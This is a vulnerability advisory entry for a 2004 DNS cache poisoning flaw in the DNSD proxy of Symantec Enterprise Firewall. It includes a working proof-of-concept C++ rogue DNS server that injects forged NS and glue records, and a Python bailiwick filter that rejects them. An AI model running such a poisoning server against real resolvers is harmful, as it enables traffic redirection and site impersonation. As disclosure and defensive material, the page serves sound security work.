Symantec Enterprise Firewall DNSD DNS Cache Poisoning Vulnerability

Vulnerability ID: 1107998    Vulnerability type: Other
Published: 2004-06-15    Updated: 2005-10-20
CVE: CVE-2004-1754
CNNVD-ID: CNNVD-200406-050
Platform: Windows    CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/24218
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200406-050
|Details
Symantec Enterprise Firewall is an enterprise-grade firewall that includes a DNSD proxy. The DNSD implementation in Symantec Enterprise Firewall has a flaw that a remote attacker can use for man-in-the-middle attacks, site impersonation and various other attacks. The core problem is that the DNSD proxy does not properly check that the data returned by a remote DNS server is actually related to the records that were requested. An attacker who controls a DNS server can return a malicious reply that inserts forged DNS entries into the target system's cache, enabling man-in-the-middle, denial-of-service or social-engineering attacks.
|Exploit (PoC)
source: http://www.securityfocus.com/bid/10557/info

It is reported that dnsd is prone to a cache poisoning vulnerability.

Dnsd does not ensure that the data returned from a remote DNS server contains related information about the requested records.

An attacker could exploit this vulnerability to deny service to legitimate users by redirecting traffic to inappropriate hosts. Man-in-the-middle attacks, impersonation of sites, and other attacks may be possible.

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
 // close down the server system
 pos_setquitflag();
}

int main(int argc, char **argv) {
 _addr a;

 try {
   /* get command-line arguments */
   if (argc != 2 ) {
     printf( "Usage: %s [domainname]\n", argv[0] );
     return 1;
   } else {
     dyndomain = argv[1];
     txt_to_addr(&a, "any");
   }

   poslib_config_init();

   /* bring up posadis */
   servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

   // use the posadis logging system
   pos_log(context_none, log_info, "Proof of concept DNS server starting up...");

   // set signal handlers
   signal(SIGINT, cleanup);
   signal(SIGTERM, cleanup);

   // set query function
   handle_query = my_handle_query;

   // run server
   posserver_run();
 } catch (PException p) {
   printf("Fatal exception: %s\n", p.message);
   return 1;
 }

 return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
 DnsMessage *a = new DnsMessage();
 DnsQuestion q;
 DnsRR rr;

 /* set a as an answer to the query */
 a->ID = query->message->ID;
 a->RD = query->message->RD;
 a->RA = false;

 if (query->message->questions.begin() == query->message->questions.end()) {
   /* query did not contain question */
   a->RCODE = RCODE_QUERYERR;
   return a;
 }
 q = *query->message->questions.begin();
 a->questions.push_back(q);
 a->QR = true;

 pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(), str_qtype(q.QTYPE).c_str());

 if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
   rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
   string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); // Anything...
   rr.RDLENGTH = data.size();
   rr.RDATA = (char *)memdup(data.c_str(), data.size());
   a->answers.push_back(rr);

   rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
   data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
   rr.RDLENGTH = data.size();
   rr.RDATA = (char *)memdup(data.c_str(), data.size());
   a->authority.push_back(rr);

   rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
   data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
   rr.RDLENGTH = data.size();
   rr.RDATA = (char *)memdup(data.c_str(), data.size());
   a->additional.push_back(rr);
 } else {
   /* we don't want this */
   a->RCODE = RCODE_SRVFAIL;
 }
 return a;
}
#########################################################
# End poc.cpp
#########################################################
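The missing check described above is a bailiwick check: records in a reply are only trusted if their owner names fall within the zone the queried server is responsible for. The following Python is an added example (not part of the advisory or the PoC) of such a filter, run against a constructed reply shaped like the one the PoC returns; the zone name example.org and the glue-trust rule are assumptions for the illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    name: str   # owner name
    rtype: str  # record type, e.g. "A" or "NS"
    rdata: str  # textual RDATA


def _labels(name):
    # Normalise to a label tuple: trailing dot and case are insignificant in DNS.
    return tuple(name.rstrip(".").lower().split("."))


def in_bailiwick(owner, zone):
    """True if owner equals zone or lies beneath it (the root zone covers all)."""
    o, z = _labels(owner), _labels(zone)
    return z == ("",) or (len(o) >= len(z) and o[-len(z):] == z)


def filter_response(zone, answers, authority, additional):
    """Drop records outside the bailiwick of the zone the server was asked about.

    Returns (kept, dropped); kept maps section name -> list of RR."""
    kept = {"answers": [], "authority": [], "additional": []}
    dropped = []
    sections = (("answers", answers), ("authority", authority), ("additional", additional))
    for section, rrs in sections:
        for rr in rrs:
            (kept[section] if in_bailiwick(rr.name, zone) else dropped).append(rr)
    # Glue (assumed rule): an additional A record is only credible if an
    # in-bailiwick NS record in the same reply names its host.
    ns_hosts = {_labels(rr.rdata) for rr in kept["authority"] if rr.rtype == "NS"}
    glue = [rr for rr in kept["additional"] if rr.rtype != "A" or _labels(rr.name) in ns_hosts]
    dropped += [rr for rr in kept["additional"] if rr not in glue]
    kept["additional"] = glue
    return kept, dropped


# Constructed reply mirroring the PoC: the resolver asked the server responsible
# for example.org (assumed zone) for www.example.org/A and got back an unrelated
# NS record for "org" plus glue for the attacker's name server.
POISONED = {
    "answers": [RR("www.example.org", "A", "200.200.200.200")],
    "authority": [RR("org", "NS", "fakedns.com")],
    "additional": [RR("fakedns.com", "A", "200.200.200.201")],
}


def demo(zone="example.org"):
    return filter_response(zone, POISONED["answers"], POISONED["authority"], POISONED["additional"])
```

With the check in place only the in-zone answer reaches the cache; the "org" NS record and the fakedns.com glue are discarded, which is exactly what the PoC relies on the proxy not doing.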
|References

Source: BID
Name: 10557
Link: http://www.securityfocus.com/bid/10557
Source: securityresponse.symantec.com
Link: http://securityresponse.symantec.com/avcenter/security/Content/2004.06.21.html
Source: SECUNIA
Name: 11888
Link: http://secunia.com/advisories/11888
Source: BUGTRAQ
Name: 20040615 Symantec Enterprise Firewall DNSD cache poisoning Vulnerability
Link: http://lists.virus.org/bugtraq-0406/msg00234.html
